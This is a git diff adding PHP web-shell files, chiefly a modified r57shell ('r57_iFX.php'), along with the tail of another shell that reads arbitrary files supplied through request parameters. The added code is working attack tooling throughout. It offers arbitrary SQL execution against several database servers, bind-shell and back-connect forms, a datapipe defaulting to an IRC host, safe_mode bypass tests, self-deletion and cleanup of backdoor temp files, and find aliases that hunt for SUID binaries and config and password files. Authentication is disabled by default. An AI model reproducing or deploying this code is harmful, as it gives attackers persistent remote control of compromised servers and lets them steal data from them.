+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f;
+
+$u1p=""; // File to Include... or use _GET _POST
+$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
+
+
+
+echo "<PRE>\n";
+if(empty($u1p)){
+if(empty($_GET['u1p'])){
+if(empty($_POST['u1p'])){
+die("<FONT COLOR=\"RED\"><CENTER><span lang=\"ar-sa\">&#1578;&#1593;&#1583;&#1610;&#1604; &#1608;&#1578;&#1591;&#1608;&#1610;&#1585; </span>\ Mohajer22</CENTER></FONT>");
+} else {
+$u1p=$_POST['u1p'];
+}
+} else {
+$u1p=$_GET['u1p'];
+}
+}
+
+$temp=tempnam($tymczas, "cx");
+
+if(copy("compress.zlib://".$u1p, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+<B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
+access.</CENTER></FONT>");
+}
+
+
+
+
+
+?>
+
diff --git a/php/r57_iFX.php b/php/r57_iFX.php
new file mode 100644
index 0000000..8badfc3
--- /dev/null
+++ b/php/r57_iFX.php
@@ -0,0 +1,1917 @@
+<?php
+/******************************************************************************************************/
+/*
+/*                                     #    #        #    #
+/*                                     #   #          #   #
+/*                                    #    #          #    #
+/*                                    #   ##   ####   ##   #
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##   ####   ##   ##
+/*                                   ###   ############   ###
+/*                                   ########################
+/*                                        ##############
+/*                                 ######## ########## #######
+/*                                ###   ##  ##########  ##   ###
+/*                                ###   ##  ##########  ##   ###
+/*                                 ###   #  ##########  #   ###
+/*                                 ###   ##  ########  ##   ###
+/*                                  ##    #   ######   #    ##
+/*                                   ##   #    ####   #    ##
+/*                                     ##                 ##
+/*
+/*
+/*
+/*  r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ???????  ?? ??????? ????? ???????
+/*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
+/*  ??????: 1.23
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by 1dt.w0lf
+/*  RST/GHC http://rst.void.ru , http://ghc.ru
+/*  ANY MODIFIED REPUBLISHING IS RESTRICTED
+/******************************************************************************************************/
+//di modif ama pluto
+//di modif lagi ama iFX
+
+
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = " ~Alissa~";
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_SERVER as $k=>$v)
+  {
+  $_SERVER[$k] = stripslashes($v);
+  }
+ }
+
+/* ~~~ ?????????????? ~~~ */
+
+// $auth = 1; - ?????????????? ????????
+// $auth = 0; - ?????????????? ?????????
+$auth = 0;
+
+// ????? ? ?????? ??? ??????? ? ???????
+// ?? ???????? ??????? ????? ??????????? ?? ???????!!!
+$name=''; // ????? ????????????
+$pass=''; // ?????? ????????????
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="Modified By iFX"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://lintah-club.ueuo.com>HELLW access denied tau'!!!, soryy neeh cuy!! :D</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- ??????????  ???? -->
+<html>
+<head>
+<title>:: The r57 shell with modified by iFX :: listening L\'Arc~en~Ciel - MilkyWay::</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+body,td,th {
+color: #00FF00;
+}
+tr {
+BORDER-RIGHT:  #000000 1px solid;
+BORDER-TOP:    #97C296 1px solid;
+BORDER-LEFT:   #97C296 1px solid;
+BORDER-BOTTOM: #000E6A 1px solid;
+}
+td {
+BORDER-RIGHT:  #000000 1px solid;
+BORDER-TOP:    #97C296 1px solid;
+BORDER-LEFT:   #97C296 1px solid;
+BORDER-BOTTOM: #000000 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #333333 0px; 
+BORDER-TOP:    #97C296 0px;
+BORDER-LEFT:   #97C296 0px;
+BORDER-BOTTOM: #333333 0px;
+BACKGROUND-COLOR: #000000;
+}
+.td1 {
+BORDER-RIGHT:  #333333 0px;
+BORDER-TOP:    #97C296 0px;
+BORDER-LEFT:   #97C296 0px;
+BORDER-BOTTOM: #333333 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+
+BORDER-RIGHT:  #333333 0px;
+BORDER-TOP:    #333333 0px;
+BORDER-LEFT:   #333333 0px;
+BORDER-BOTTOM: #333333 0px;
+}
+table {
+BORDER-RIGHT:  #97C296 1px outset;
+BORDER-TOP:    #97C296 1px outset;
+BORDER-LEFT:   #97C296 1px outset;
+BORDER-BOTTOM: #97C296 1px outset;
+BACKGROUND-COLOR: #004F0A;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #00CA0B 1px solid;
+BORDER-LEFT:   #00CA0B 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #004F0A;
+font: 8pt Verdana;
+color : #FFFFFF;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #00CA0B 1px solid;
+BORDER-LEFT:   #00CA0B 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #004F0A;
+font: 8pt Verdana;
+color:#80DBEE
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #004F0A;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #00CA0B 1px solid;
+BORDER-LEFT:   #00CA0B 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #004F0A;
+font: Fixedsys bold;
+color:#E49F1F;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+background-color: #000000;
+}
+
+A:link {COLOR: #97C296; TEXT-DECORATION: none}
+A:visited { COLOR: #2BE421; TEXT-DECORATION: none}
+A:active {COLOR: #000099; TEXT-DECORATION: none}
+A:hover {color: #2FADD7; TEXT-DECORATION: underline}
+</STYLE>';
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+  echo $head;
+  switch($_POST['db'])
+  {
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mysql_query($query,$db);
+      $error = @mysql_error($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@mysql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mysql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @mysql_free_result($res);
+      }
+     }
+   @mysql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mssql_query($query,$db);
+      if (@mssql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mssql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
+      @mssql_free_result($res);
+      }
+     }
+   @mssql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+   {
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @pg_query($db,$query);
+      $error = @pg_errormessage($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@pg_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @pg_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @pg_free_result($res);
+      }
+     }
+   @pg_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>";
+  break;
+  case 'Oracle':
+  $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
+  if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; }
+  else
+   {
+   $querys = @explode(';',$_POST['db_query']);
+   foreach($querys as $num=>$query)
+    {
+    if(strlen($query)>5) {
+    echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+    $stat = @ociparse($db, $query);
+    @ociexecute($stat);
+    if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
+    else
+     {
+     $rowcount = @ocirowcount($stat);
+     if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
+     else {
+     echo "<table width=100%><tr>";
+     for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }
+     echo "</tr>";
+     while(ocifetch($stat))
+      {
+      echo "<tr>";
+      for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
+      echo "</tr>";
+      }
+     echo "</table><br>";
+     }
+     @ocifreestatement($stat);
+     }
+    }
+    }
+   @ocilogoff($db);
+   }
+  break;
+  }
+ echo "<form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+/*
+????? ?????
+$language='ru' - ???????
+$language='eng' - ??????????
+*/
+$language='eng';
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'???????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text77'=>'???????? ????????? ???? ??????',
+'ru_text78'=>'?????????? ???????',
+'ru_text79'=>'?????????? ???????',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Sikat..!!',
+'eng_text2' =>'Running..di server',
+'eng_text3' =>'Jalankan perintah',
+'eng_text4' =>'Direktori Skrg',
+'eng_text5' =>'Upload files ke server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Sikat',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password untuk',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Table',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text77'=>'Show database structure',
+'eng_text78'=>'show tables',
+'eng_text79'=>'show columns',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
